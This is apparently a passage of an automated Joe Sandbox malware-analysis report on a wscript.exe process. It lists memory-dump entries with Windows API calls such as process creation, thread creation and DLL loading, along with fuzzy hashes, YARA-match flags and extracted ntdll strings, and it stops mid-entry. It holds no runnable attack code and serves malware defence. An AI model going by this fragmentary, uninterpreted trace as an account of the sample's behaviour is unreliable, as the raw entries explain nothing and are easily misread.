                                                                                                          • Instruction ID: b8c0743317cc1a05c56cfdc031e68753f4c605d7db3bd8a0fa1b7cecb941ebbb
                                                                                                          • Opcode Fuzzy Hash: 700bccd0693fc6de2cb298a2d104f14b142d86285ec905ff9060625a6a4abde7
                                                                                                          • Instruction Fuzzy Hash: 80318BB1600605BBDB24DFA4CC84FEBBBB9BB88740F14811CF91D6B241C3746A50CBA1
                                                                                                          APIs
                                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00764762
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_750000_wscript.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: Load
                                                                                                          • String ID:
                                                                                                          • API String ID: 2234796835-0
                                                                                                          • Opcode ID: 949b144e7e312fa6565cca895f987050310427acaaecf67f35788da544e7e580
                                                                                                          • Instruction ID: f2113aa0a26f630fc6d215c3e2b1c3d31b9f65e318217561af0a2e60fa5001f2
                                                                                                          • Opcode Fuzzy Hash: 949b144e7e312fa6565cca895f987050310427acaaecf67f35788da544e7e580
                                                                                                          • Instruction Fuzzy Hash: 62011EB5E0020DBBDF10EAA4DC46F9DB3789B54748F108195EE0D97241F675EB148B91
                                                                                                          APIs
                                                                                                          • CreateProcessInternalW.KERNELBASE(?,?,?,?,007684BE,00000010,?,?,?,00000044,?,00000010,007684BE,?,?,?), ref: 00779B40
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_750000_wscript.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: CreateInternalProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 2186235152-0
                                                                                                          • Opcode ID: ebb08199cc5bad9b2c4e3851bdd9dd6f1b566f401236a2b3023d7dc940511dbe
                                                                                                          • Instruction ID: 3d602bbe9d443e5bff77dc7622aada373433595cb91cd11b480be9fc52c49c2a
                                                                                                          • Opcode Fuzzy Hash: ebb08199cc5bad9b2c4e3851bdd9dd6f1b566f401236a2b3023d7dc940511dbe
                                                                                                          • Instruction Fuzzy Hash: 5B01DDB2204508BBDB54DF9DDC85EEB77AEAF8C750F008208BA0DE3241D634F8518BA4
                                                                                                          APIs
                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00759F05
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_750000_wscript.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: CreateThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 2422867632-0
                                                                                                          • Opcode ID: 1cb3e4fe6bae8225d7ea7ea5f5ea4fad5f8e8bd5f1a8c2682007be34387ce942
                                                                                                          • Instruction ID: c512434d58a497696772ecefff6aa0ab79bba7e5ca6eb19062e3364cb0f26cd6
                                                                                                          • Opcode Fuzzy Hash: 1cb3e4fe6bae8225d7ea7ea5f5ea4fad5f8e8bd5f1a8c2682007be34387ce942
                                                                                                          • Instruction Fuzzy Hash: 97F0653334021476E73065A99C46FD7764CDB80BA2F584469FB0CEA1C1D996B80142E4
                                                                                                          APIs
                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00759F05
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_750000_wscript.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: CreateThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 2422867632-0
                                                                                                          • Opcode ID: 23e0dc4aa700540a1f615094e6818fab4afbf3800de05d2961fbe298be2e5d91
                                                                                                          • Instruction ID: 9f8631321567c0d285350a8ff17454a32b6434919d603dd54a4cbe876de24023
                                                                                                          • Opcode Fuzzy Hash: 23e0dc4aa700540a1f615094e6818fab4afbf3800de05d2961fbe298be2e5d91
                                                                                                          • Instruction Fuzzy Hash: EBF09B3334030476D23065A98C47FE7765C9B80B91F654019FB0DEF1C1E9E6B80142E4
                                                                                                          APIs
                                                                                                          • RtlDosPathNameToNtPathName_U.NTDLL(?,?,?,?), ref: 00778630
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_750000_wscript.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: Path$NameName_
                                                                                                          • String ID:
                                                                                                          • API String ID: 3514427675-0
                                                                                                          • Opcode ID: 042c917bc6613f329c14f01f716377f63da2cedc376136f5901288221937374a
                                                                                                          • Instruction ID: 74ca7f8d6cb49bfacf3a40ed7b8f30f9fe20b7f7fa93ea72bb75db8b92007f52
                                                                                                          • Opcode Fuzzy Hash: 042c917bc6613f329c14f01f716377f63da2cedc376136f5901288221937374a
                                                                                                          • Instruction Fuzzy Hash: BCF039B5200204BBDA10EF59DC41EEB77ADEFC9750F008009FA08A7241DA74B8118BF4
                                                                                                          APIs
                                                                                                          • RtlAllocateHeap.NTDLL(00761BB9,?,?,00761BB9,^Xw,?,?,00761BB9,^Xw,00001000,?,?,00000000), ref: 00779A3C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_750000_wscript.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: AllocateHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 1279760036-0
                                                                                                          • Opcode ID: 311047913c47a87db36be3ff7f68d10f10ca09af2a13ea7d97f05a6941379270
                                                                                                          • Instruction ID: 601b94109b07a3283fc284b3004b04f8f1ec96160cbf49f464b7683f9bd762c9
                                                                                                          • Opcode Fuzzy Hash: 311047913c47a87db36be3ff7f68d10f10ca09af2a13ea7d97f05a6941379270
                                                                                                          • Instruction Fuzzy Hash: D9E09275200204BBDA50EE58DC45FEF37ACEFC5750F404018F909A7241CA70B8118BB4
                                                                                                          APIs
                                                                                                          • GetFileAttributesW.KERNELBASE(?), ref: 0076852C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_750000_wscript.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: AttributesFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 3188754299-0
                                                                                                          • Opcode ID: aa6a25dfeea417970d8670925c6ee4bf7018ea7579c5ae5e63e8783084a036ba
                                                                                                          • Instruction ID: f6f1e48fe65877b5a8056dd8b6d25af9ec22627c6fdaae58bc43591f7c38f5ea
                                                                                                          • Opcode Fuzzy Hash: aa6a25dfeea417970d8670925c6ee4bf7018ea7579c5ae5e63e8783084a036ba
                                                                                                          • Instruction Fuzzy Hash: 5DE0203210020427FB205978EC45F6133885744764F484750BC1FDB6C2F57DFC124150
                                                                                                          APIs
                                                                                                          • GetFileAttributesW.KERNELBASE(?), ref: 0076852C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_750000_wscript.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: AttributesFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 3188754299-0
                                                                                                          • Opcode ID: a1b7dff50c4bda395dd30d7f31368a16402cbe448994fb534244bca65dba5a3d
                                                                                                          • Instruction ID: 4c9d2353d079ccf10483d86a9782e4e0032ab2c165b30a0db167bcb22734dfec
                                                                                                          • Opcode Fuzzy Hash: a1b7dff50c4bda395dd30d7f31368a16402cbe448994fb534244bca65dba5a3d
                                                                                                          • Instruction Fuzzy Hash: D8E0263210020437EB206A68DC46F653388AB48BA0F884710BC1B9B6C2EA7CFC124250
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNELBASE(00008003,?,?,00761EC0,0077819F,^Xw,00761E83), ref: 00768323
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_750000_wscript.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode
                                                                                                          • String ID:
                                                                                                          • API String ID: 2340568224-0
                                                                                                          • Opcode ID: 144af6164f50f138055edf0c842d7d41316278334abc94ad1099574eb3c18c8c
                                                                                                          • Instruction ID: 511b4da1ce04dfe331ac1252657ca6b5077f67c7a78190acbfeb6aa3c7ac0cf3
                                                                                                          • Opcode Fuzzy Hash: 144af6164f50f138055edf0c842d7d41316278334abc94ad1099574eb3c18c8c
                                                                                                          • Instruction Fuzzy Hash: D6D05E72380304BBF640A6E5CC5BF56328D9B44B91F8481A8BE0CEA2C2E89AF5004666
                                                                                                          APIs
                                                                                                          • PostThreadMessageW.USER32(?,00000111), ref: 00760F97
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_750000_wscript.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: MessagePostThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 1836367815-0
                                                                                                          • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                                          • Instruction ID: 88bbc810bdb393fa1d867a0fa9a2a50c1fa40d148a910e0269bf471f75ae8714
                                                                                                          • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                                          • Instruction Fuzzy Hash: A1D02277B0000C7AAA1245C4ACC1CFFB76CEB84BA6F004063FF08E2040E6218D160BF0
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 2e2de4216346fe06e2d3c8cc05596096544a9df39751a05f9c7bac27c1f99b86
                                                                                                          • Instruction ID: cfe8dbbd66885c38babd4fbf39f57e093b988dcbf442d2628fc5e15703279a76
                                                                                                          • Opcode Fuzzy Hash: 2e2de4216346fe06e2d3c8cc05596096544a9df39751a05f9c7bac27c1f99b86
                                                                                                          • Instruction Fuzzy Hash: B0B09B759015D5C5FB11F760470C71779546BD1705F15C0B1E2034641E4738D1D1F175
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590790163.00000000047B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047B0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_47b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a86ac50f621ab182d789d9e865fdd4af1c51b016fa0bf3287368b28de7dbb2a4
                                                                                                          • Instruction ID: eda17815e8cfb928fac85f50d653374b5e714e4dfdddcf6bb1901253a8afcf27
                                                                                                          • Opcode Fuzzy Hash: a86ac50f621ab182d789d9e865fdd4af1c51b016fa0bf3287368b28de7dbb2a4
                                                                                                          • Instruction Fuzzy Hash: 0541C171618B494FD368AE6890857F6B3E1FF49304F505A2DD9CAC3752EA70F84286C5
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590790163.00000000047B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047B0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_47b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                          • API String ID: 0-3754132690
                                                                                                          • Opcode ID: 7ab08c4de773a3b8ee34a8063e8ca4aaaa6e64d904a6afb733b2d233b62539be
                                                                                                          • Instruction ID: f43adc2da95ec59021fac38342d71e9ab911e8b6779bf09cb4505062a6cf7122
                                                                                                          • Opcode Fuzzy Hash: 7ab08c4de773a3b8ee34a8063e8ca4aaaa6e64d904a6afb733b2d233b62539be
                                                                                                          • Instruction Fuzzy Hash: 319153F04482988AC7158F54A0652AFFFB1EBC6305F15816DE7E6BB243C3BE8905CB85
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ___swprintf_l
                                                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                          • API String ID: 48624451-2108815105
                                                                                                          • Opcode ID: f26925ac90fb3241194b27e513ab03b660c99966cb47c4aa313db4262037885a
                                                                                                          • Instruction ID: 55f1c82e41a9d18083e2fee14a3e533af347ad90ecc319cfd1faa242859aafb2
                                                                                                          • Opcode Fuzzy Hash: f26925ac90fb3241194b27e513ab03b660c99966cb47c4aa313db4262037885a
                                                                                                          • Instruction Fuzzy Hash: D951E7B6A04126BFDB20DF988A9097EF7B8BB493047548679E495D7645E334FE00CBE0
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ___swprintf_l
                                                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                          • API String ID: 48624451-2108815105
                                                                                                          • Opcode ID: f28c12b15afd84aef9c9bbad56f3a6fdd6eac3422518980eeb0ca7ec4d8c84e7
                                                                                                          • Instruction ID: 48778da9d6cd04abfcd3a6c27a3faeef60440f379c1936d6f21ca3448fe5ed88
                                                                                                          • Opcode Fuzzy Hash: f28c12b15afd84aef9c9bbad56f3a6fdd6eac3422518980eeb0ca7ec4d8c84e7
                                                                                                          • Instruction Fuzzy Hash: 6651E171A00645BBDF20DF9DC89097EB7FDAB48204B048CB9E496D7641EA74FE408B61
                                                                                                          Strings
                                                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 04954787
                                                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04954655
                                                                                                          • Execute=1, xrefs: 04954713
                                                                                                          • ExecuteOptions, xrefs: 049546A0
                                                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 049546FC
                                                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04954725
                                                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04954742
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                          • API String ID: 0-484625025
                                                                                                          • Opcode ID: 327ff898aacd76b518324f80ffb74c0fc90634ea92965205118f10e297db355e
                                                                                                          • Instruction ID: 6ce71fb0d815bc915bacb8a67dc02c5e7d9c748bb29c782275b020beccf21e0e
                                                                                                          • Opcode Fuzzy Hash: 327ff898aacd76b518324f80ffb74c0fc90634ea92965205118f10e297db355e
                                                                                                          • Instruction Fuzzy Hash: AD511631A0021E7AEF10EAA4EC89FA977ADEF84344F1405F9E505A71A1EB71BE41CF51
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __aulldvrm
                                                                                                          • String ID: +$-$0$0
                                                                                                          • API String ID: 1302938615-699404926
                                                                                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                          • Instruction ID: c4540fbd2a4391a2467f9eb60f014ce33e586bf20a01973146d3ca4802c8ec1e
                                                                                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                          • Instruction Fuzzy Hash: 1F81E330E052699FDF24CE68CA507FEBBFAAF85320F184539D865A7699C734B940CB50
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ___swprintf_l
                                                                                                          • String ID: %%%u$[$]:%u
                                                                                                          • API String ID: 48624451-2819853543
                                                                                                          • Opcode ID: 35a38a460dd5e34d7eb47807e43de5b97845b8c51e4a5e7990f7e6c4a8560346
                                                                                                          • Instruction ID: a2c56c90abc04862f95df46a2d8525515cb57f7ad861c954e1be607e013fa6d1
                                                                                                          • Opcode Fuzzy Hash: 35a38a460dd5e34d7eb47807e43de5b97845b8c51e4a5e7990f7e6c4a8560346
                                                                                                          • Instruction Fuzzy Hash: B7215176E00119ABDB20DFA9D840EEEBBECEF44754F140576E905E3204E730E9118BA1
                                                                                                          Strings
                                                                                                          • RTL: Re-Waiting, xrefs: 0495031E
                                                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 049502E7
                                                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 049502BD
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                          • API String ID: 0-2474120054
                                                                                                          • Opcode ID: 6e3a62fc68015007dff79bec9006db07f7cccafc8b476c488cb151056b1286b9
                                                                                                          • Instruction ID: 5923a0859c15b032ba46a9181b5d8284529271aec47a9a115a8fb7304592018c
                                                                                                          • Opcode Fuzzy Hash: 6e3a62fc68015007dff79bec9006db07f7cccafc8b476c488cb151056b1286b9
                                                                                                          • Instruction Fuzzy Hash: F5E1AF316047419FD735CF28C884B2AB7E5BB88714F244A7DE8A58B2E1E7B4F945CB42
                                                                                                          Strings
                                                                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04957B7F
                                                                                                          • RTL: Re-Waiting, xrefs: 04957BAC
                                                                                                          • RTL: Resource at %p, xrefs: 04957B8E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                          • API String ID: 0-871070163
                                                                                                          • Opcode ID: 57be9af7e9e82957ad22f344e364829605dee8227977f3456f15ccb89d5e423a
                                                                                                          • Instruction ID: 7cee8bfbaeb783b0a411d9013c898729daabec1e3acd4f7506c6504f31e8776b
                                                                                                          • Opcode Fuzzy Hash: 57be9af7e9e82957ad22f344e364829605dee8227977f3456f15ccb89d5e423a
                                                                                                          • Instruction Fuzzy Hash: E741B1317417069FD720DE25D840B6AB7EAEB88714F100A3DF95ADB7A0DB31F5058B91
                                                                                                          APIs
                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0495728C
                                                                                                          Strings
                                                                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04957294
                                                                                                          • RTL: Re-Waiting, xrefs: 049572C1
                                                                                                          • RTL: Resource at %p, xrefs: 049572A3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                          • API String ID: 885266447-605551621
                                                                                                          • Opcode ID: 22a36d17815388df954efd4e2562063699fd6acff81e6ad1cc9218ff812ff58d
                                                                                                          • Instruction ID: d720c9362e78088ab37f9e0ed95197c60173e6e3d601cc4bdc406249e4456f44
                                                                                                          • Opcode Fuzzy Hash: 22a36d17815388df954efd4e2562063699fd6acff81e6ad1cc9218ff812ff58d
                                                                                                          • Instruction Fuzzy Hash: F541E131700206AFE720DE65DC41B66B7A6FB84714F204A39FD55EB690DB31F9028BD0
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ___swprintf_l
                                                                                                          • String ID: %%%u$]:%u
                                                                                                          • API String ID: 48624451-3050659472
                                                                                                          • Opcode ID: cf39f8041f841c2cd7b44fc39f517dd814200ce692c745775f71d9ca96a19f5d
                                                                                                          • Instruction ID: be7c4afec9d755f4cb42eae3cfb5f2b1eec208b760b2ea68ed89edc6bb21621c
                                                                                                          • Opcode Fuzzy Hash: cf39f8041f841c2cd7b44fc39f517dd814200ce692c745775f71d9ca96a19f5d
                                                                                                          • Instruction Fuzzy Hash: 1E314576A00119AFDF20DF2DDC41BEE77E8EB54614F4449A5E849D3240EB30BE449FA1
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __aulldvrm
                                                                                                          • String ID: +$-
